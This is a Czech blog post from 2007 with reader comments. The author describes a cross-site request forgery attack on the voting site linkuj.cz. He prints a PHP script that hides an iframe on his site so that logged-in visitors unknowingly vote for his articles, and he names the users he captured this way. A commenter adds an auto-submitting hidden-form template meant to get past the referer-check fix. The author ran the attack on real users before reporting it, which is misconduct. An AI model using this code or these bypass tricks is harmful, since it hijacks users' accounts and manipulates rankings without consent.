MzK Hacknul linkuj.cz Mozektevidi.net - Mozektevidi.net.

MzK Hacknul linkuj.cz

Naposled o bezpečnosti portálu linkuj. Hack, bezpečnostní chyba, plain-text. Můj příběh a moje minutová sláva.

image of MzK Hacknul linkuj.cz

Bezpečnostní chyba linkuj.cz

Cross-Site Request Forgery je už opravené, jdu sepsat již nefunkční návod, jak se mi povedlo dostat na kolena známý server linkuj.cz

Kdy mě to napadlo?

Zrovna jsem byl s kamarádkou Adélou (to je ta s tetováním draka) na kafi a povídali si o nějakých blbostech. Nevím jak je to možné, na co jsem přesně myslel, napadlo mě, že bych mohl ulečit linkařům práci s linkováním.

Přístupný web

linkuj.cz hacked

Moje myšlenka byla jasná. Dokonalá optimalizace. Nebudu optimalizovat pro nějaké roboty, ale optimalizuji svůj web přímo pro uživatele. Protože na návštěvnících mi opravdu záleží, nejsou mi lhostejní. Jak jim co nejvíce zpříjemnit pobyt na stránce? Neotravovat je žádostí o linkování, ale linkovat za ně. Ušetřit jim práci s klikáním na inkonku linkuj.cz a vše dělat automaticky.
Takovou službu jistě ocení. Když mám vše naplánované, loučím se s Adélkou a jedu domů. Je už pozdě v noci, pouštím počítač. Všem mám předem vymyšlené, php skripty linkuj.cz vůbec neprotestují. Do svého webu umístím neviditelní i frame s adresou

http://linkuj.cz/?id=linkuj&url=http://mozektevidi.net/$co_linkují

 

optimalizace skritpu

Není mi lhostejný trafik mojich návštěvníků. Proto se neviditelný skript zobrazoval pouze jednou. A možnost linkování nenabízím každému. Jen vyvoleným.

Výsledný skript

 


 <?

$co_chce_linkovat
= htmlspecialchars($_SERVER["REQUEST_URI"]);
$ip = $_SERVER["REMOTE_ADDR"];
$referer = htmlspecialchars($_SERVER["HTTP_REFERER"]);
if (
$ip !== "xxx.132.xx.xxx" ) { //Ja linkovat nemusim
    
if (ereg("^http:/.*linkuj.c.*", $referer)){ // je ze linkuj.cz
    
$query = mysql_query("SELECT * FROM linkuj WHERE ip="$ip" "); // uz linkoval?
    
$pocet_zaznamu = mysql_num_rows($query);
      if ((
$pocet_zaznamu <= 0) or ($pocet_zaznamu = "")){ // neni v db
?>
<div style="display:none" ><iframe width="10" height="10" src="http://linkuj.cz/?id=linkuj&url=http://mozektevidi.net<? echo $co_chce_linkovat; ?>"></iframe></div>
<?
MySQL_Query
("INSERT INTO linkuj VALUES ("", "$ip")") or die (mysql_error());
}}}
?>

No uznejte sami, že tento skritp je minutová záležitost. Cross-site request forgery přes iframe. Linkuj vůbec neprotestovalo. Nahrál jsem soubory na web a svůj článek si zalinkoval Z počátku nic moc, první ovečky dorazili později. Pak linků přýbývalo exponenciálně. Můj článek postupoval výše a výše, návštěvnost stoupala. Čím výše byl článek, tím se rychleji zvyšoval počet kliknutí. V této době jsem upozornil admina linkuj.cz.
Zjištuji, že stačí mít dobře hodnocený článek a spousta lidí pro něj hlasuje, i přestože se jim nelíbí. Drží se stáda!. Přichází první zprávy na ICQ od internetových přátel. Všichni pochopili co se mi povedlo, chválou nešetří Machr

Sepisuji první upozornění všem. Návod nezveřejňuji, admin stále neodepsal, nevím za jak dlouho by chybu opravil. Nechci mu dělat z linkuj.cz bordel zveřejněním návodu.

Moje minutová sláva

Vychází článek plain-text, kde mě odkazuje. V té době už začínám diskutovat s adminem linkuj.cz. Vysvětluji mu způsob "hacknutí", navrhuji řešení, upozorňuji ho na jeho chyby. V pohodě se s ním dá mluvit.

Stoyan

Napsal mi na ICQ Stoyan. Vyptává se. Naznačuji mu způsob, nechtěl jsem mu vysvětlit vše do té doby, než bude chyba opravená. Nečekal jsem, že si bude chtít také ukousnout z mého chleba, objevenou chybu využije a zveřejní přesný návod na oblbnutí linkuj.cz ještě před opravením chyby. Navíc mě neodkazoval, za což má u mně malé nepatrné mínus Mrknutí. V té chvíli mi to přišlo docela sobecké.

Chyba je opravená

V současné době je chyba opravená kontrolou refereru. Já si v tom případě nezalinkuji, protože si referer blokuji.

Seznam linkařů

Seznam linkařů, co mě linkovali. Zdůrazněný jsou ti, které znám:
martines23, skaven, strokie, jeef, kajinek32, dufique, Sigilium, GurmetKlub.cz, CUKETKA.CZ, rADo, kraja, pablicko, czechian, acidofil, Nox.lbc, 123, JaS, xwkerim, xergic, Vindaloo, kozzlik, jIRI-san, tPaK, Houdas, arth, baracudakb, SpeedyGT, B0NG0, wokoman, trupik, Machi, layosh1, sodae, lemik, Ondrabig, Devil, slunko, dragony, carter, Diplomat, HarvyM, zoso, Pacek, koderj1, frana, MiK, radoado, zdenecek, gaidjin, kirby!, Godoy, linuxák, kblh, Dash, hell-brother, szk, SUK, gormadok, SteWe, daproof, random, kakas, golfy, skaven, Fred, jeef, kajinek32, KAIX, stribny, meca, tukak, pablicko, zrcatka, Nox.lbc, ondrakub, JaS, xwkerim, xergic, rushid, kozzlik, jIRI-san, shippy, pinky, Pumpkin, B0NG0, mylan, nupix, Machi, marekl, External, deevil, layosh1, syntax, sodae, lemik, Devil, dragony, Diplomat, HarvyM, theri, Pacek, koderj1, MiK, radoado, zdenecek, mrtvocich, Godoy, votrava, kblh, m.s, hell-brother, ladja, gormadok, JIM, lin, bushbeat, daproof, DeWorn, T3RM0ST4T, kakas, milan99, tukak, Peca, acidofil, Nox.lbc, meba, Corky, B0NG0, clovek55, Devil, FreeRiDeR, zoso, zdenecek, DoubleThink, matajon, koffr, docek, matej21, dsmid, theboy, golfy, rolmen, Dexter, Nip, zbiejczuk, double, Sigilium, CUKETKA.CZ, meca, Nox.lbc, ondrakub, tomekson.com, lemik, Devil, HarvyM, MeteleskuBlesku, mrtvocich, m.s, noone, matej21, bushbeat, golfy, strokie, milan99, KAIX, Sigilium, stribny, bluee, Acci, tukak, dr.ik, Peca, czechian, acidofil, PCMark, zrcatka, HonzaM, Nox.lbc, meba, sedllak, MUSIC4U, JaS, kozzlik, lama_lam, tomekson.com, Pumpkin, hidden, macfinger, mylan, ObiSkyWalker, trupik, dama, marekl, deevil, DANNTO, Devil, HarvyM, MeteleskuBlesku, radoado, zdenecek, dromedár, Guggy, mrtvocich, matajon, Godoy, Z13, m.s, agile, matej21, hell-brother, jakiko, Aramon, munio, golfy, rolmen, Dexter, zbiejczuk
snad jsem na žádné nezapoměl. Podle výše uvedeného skritpu jsem dostal buď lamy co nestojí o anonymitu (referer), nebo ti co mě linkovali doopravdy, pěkně po staru ručně

Chyba je opravená a to je to nejdůležitější

Vítězné screeny

screen 1, screen 2, screen 3, screen 3.


autor článku OS | datum publikování 24.březen.2007 20:24 | články o IT bezpečnosti a obraně proti hackingu IT bezpečnost |

Kometáře

#1 matej21 www

LoL ja sem v tom seznamu 3x 8-) reaguj

datum 25.03.2007 10:29

unknown unknown

#2 Golfy wwwwww.golfy.gotia.cz

ja taky 3x :-) reaguj

datum 25.03.2007 11:31

unknown unknown

#3 MzK wwwmozektevidi.net/

TO matej21 a Golfy: Je to protože jsem tě 3x "dostal". Linkoval se mi článek o jednojádru + o linkuj. A admin mi to soustavě mazal. Tak jsem ho zalinkoval znova a proto jsi mě mohl linkovat 3x. reaguj

datum 25.03.2007 13:00

unknown unknown

#4 Golfy wwwwww.golfy.gotia.cz

aha, tak to jo :-) reaguj

datum 25.03.2007 13:22

unknown unknown

#5 Stoyan www

"Napsal mi na ICQ Stoyan. Vyptává se. Naznačuji mu způsob..." Nekecej, nic jsi nenaznacil. Jedina pravda je to, ze kdyz jsem se dovedel ze na linkuj chyba je, ze jsem se zacal zajimat. Na cely postup jsem prisel nezavisle na tobe a z meho clanku je jasne, ze i jinym zpusobem nez ty (viz skript ajax.php). Btw, ten link tam mas, tak nebrec...:-P Jinak uz jen ten nadpis obsahujici slovo "hacknul" se mi zda prehnany. Za hacknuti bych povazoval minimalne, kdyby ses dostal k jejich db a zjistil hesla useru, tohle byla jen minoritni chyba, proto je vystiznejsi, jak uz jsi jednou pouzil, slovo "oblbnul". Nebudu te ale tahat za slovo. Uzij si svych pet minut slavy:-P

(neber to jako utok proti sve osobe, pouze jsem vyjadril svuj nazor 8-) ) reaguj

datum 25.03.2007 13:38

unknown unknown

#6 NoxLbc wwwwww.rival.cz

Jó, to já jsem tam 5× ;) ale linkoval bych stejně, povedený trik, gratuluju ;) reaguj

datum 25.03.2007 14:20

unknown unknown

#7 MzK wwwmozektevidi.net/

TO Stoyan: jj, máme odlišný způsob. Ale uznej, že když víš, že tam chyba prostě je, objevení je snadné. Kvůli linku nebrečím, ale linkování by měla být samozřejmost. Je mi přišlo divný, že jsi linkoval všecho ostatní (wiki, linkuj, cCuMiNn., i ten plug-in.) pouze mě ne. Tak mi to přišlo divný, teď OK. Nadpis hakunl je trochu bulvárnější, vím to. 5 minut slávy je dávno pryč :-D
TO NoxLbc: Dík, chystám další ;-) reaguj

datum 25.03.2007 15:53

unknown unknown

#8 Dash wwwdash.nazory.cz/

Mě z toho seznamu klidně smaž, tak trošku mám proti "iFrame háčkerům" imunizovaný nastavení a hlasy (tuším 2) jsem poctivě odkliknul :) ale že si už nezalinkuju, to je teda vážně super SKULL reaguj

datum 25.03.2007 20:14

unknown unknown

#9 Morelo wwwwww.sbernice.net

no tim refererem si nijak nepomohli, nevidim problem udelat na strance tez iframe a pres javascript provadet napr. aktivaci formulare, kterej pojede na linkuj, vcetne refereru, pokud neni blokovan.
LOL reaguj

datum 25.03.2007 21:06

unknown unknown

#10 MzK wwwmozektevidi.net/

TO Dash: Jaké nastavené používáš? Zarazila mě jednoduchost provedení "útoku" a obranu na straně uživatelů moc nevidím.. Jen se odhlašovat. Za linkování díky..
TO Morelo: Vím o tom, bohužel neumím JS. Myšlenku mám stejnou, referer opravdu nepomůže. Ono to nějak půjde, začínám se učit javascript, tak uvidím jestli něco vymyslím reaguj

datum 25.03.2007 21:14

unknown unknown

#11 Morelo wwwwww.sbernice.net

TO MzK:

<html>
<body onload="enter.submit()">

- hiddeny ktery se maj odeslat -

</form>
</body>
</html>

se to proste nijak neda "zabezpecit" reaguj

datum 25.03.2007 21:21

unknown unknown

#12 Morelo wwwwww.sbernice.net

za body a pred hiddeny sem zapomel napsat:

<form method=post name=enter action="http://kam"> reaguj

datum 25.03.2007 21:22

unknown unknown

#13 MzK wwwmozektevidi.net/

TO Morelo: Na Linkuj.cz vyskočí alert okno s dotazem. Takže ještě přidat JS pro "odkliknutí" alert okna. Jestli to teda de. Podle mě budou potřeba 2 skryté framy. Jeden pro odeslání hiddenů na linkuj.cz (tam vyskočí okno), které odklikne JS kód ve druhém skrytém framu.
Obrana proti tomu samozřejmě je, ať už se jedná o autorizační tokeny, nebo opisování obrázku či nějakého textu (chce to reakci uživatele). reaguj

datum 25.03.2007 21:40

unknown unknown

#14 Lukee wwwatd.havrlant.net

"Podle výše uvedeného skritpu jsem dostal buď lamy co nestojí o anonymitu (referer)"
Nechápu, proč lamy? Existují nějaký rozumný důvod, proč si referer blokovat? Akorát pak někomu naruším statistiky, kde se zasunu do kolonky "referer nepředán či blokován" :-).

Ale jinak hezké, hezké ;-). reaguj

datum 26.03.2007 00:05

unknown unknown

#15 MzK wwwmozektevidi.net/

TO Lukee: Já používám hlavně pro větší bezepčí. Co kdybych šel na nějakou stránku a referer bych ponechal /mozektevidi.net/admininystrace/clanek/delete/ nebo jiné nebezpeční URL? Na jednu stranu (statistiky) souhlasím, sám je sleduji. Ale ta bezpečnost (anonymita) u mně vítězí. Sry za slovo lamy, je moc tvrdé, je na každém, zda si referer blokuji či nikoliv.
díky reaguj

datum 26.03.2007 14:25

unknown unknown

#16 Lukee wwwatd.havrlant.net

TO MzK: Pokud to máš dobře zabezpečené, musí ti ta URL vyhodit hlášku, že nejsi zalogovaný, ne? Nebo jak to myslíš? reaguj

datum 27.03.2007 00:35

unknown unknown

#17 MzK wwwmozektevidi.net

TO Lukee: Ano, hodí to hlášku loginu. Přesto nerad sděluji svoji strukturu administrace.. reaguj

datum 27.03.2007 08:08

unknown unknown

#18 Mr.X www

Milý pane Mzk,
Vaše články a příhody jsou jistě úsměvné, ale nazývat to celkově hackingem a sám sebe hackerem, nemyslíte že je to trochu silný výraz?
Například často uváděné příklady php injekce, či zneužití nekorektně ošetřeného upload striptu na stránce dotyčného, to je pouze využitím chyby neznalého, avšak v takové míře jednoduchosti že se to dá stěží nazívat hackingem. Ano jistě můžeme říct že hack není omezem stupni obtížnosti dané činnosti, ale upřímně opravdu si myslíte že je to to, co uvádíte statečně na svém webu pod silným nápisem "hacking"?
Umíte také jiné jazyky než pravděpodobně nejlehčí z nich php? Pokud ano, jste jistě na dobré cestě , pokud ne, všeho dočasu a neunáhlete se se seberekvalifikací z lamera na hackera takto rychle.
Nebo si vezměme například Váš wifi hacking, opravdu hacking? Ó ne pane, vždyť přeci odchytit si paket a nastavit si z něj mac adresu dokáže každý běžný uživatel po přečtení krátkého návodu. Vy to však sebevědomě nazýváte hackingem.
Proč to píšu? Nechci Vás tu nějak hanit, ale myslím že pro Vás a hlavně pro Vás, bude do začátku nejlepší nepřehánět to se svým sebevědomím do míry v jaké je to nyní.
Jak jsem však psal výše, do začátku jste vykročil správným směrem, ale nepřecházejte z chůze do sprintu zbytečně brzo.

Ale samozřejmě pod mou lehkou kritikou musím zdůraznit, že Váš web je opravdu příjemnou kratochvílí na zmírnění nudy všedního dne, stylem zajímavě a zábavně vedeným.

S přáním úspěchů Mr.X reaguj

datum 08.05.2007 13:31

unknown unknown

#19 MzK wwwmozektevidi.net

TO Mr.X: Díky.. Sám sebe hackerem nenazývám. A jak jinak popsal činnost "hacking"? Existuje nějaké jiné slovo, které označuje basic hacking? Slovo hacking používám, protože vím, že hacking nemusí být složitý a hacknout server netrvá týdny. Slovo hacknout používám, protože každý z toho pochopí o co jde. Použil jsem i slovo "oblbnout linkuj" ale když někdo bude hledat informace o hacku, nazadá do googla string "oblbnutí"
Ve slově nazývat se píše Y.
Ještě jednou díky za oprávněnou kritiku k věci a s arugmenty. Přeji hezký den. reaguj

datum 08.05.2007 13:44

unknown unknown

Nové kometáře nejsou povolené.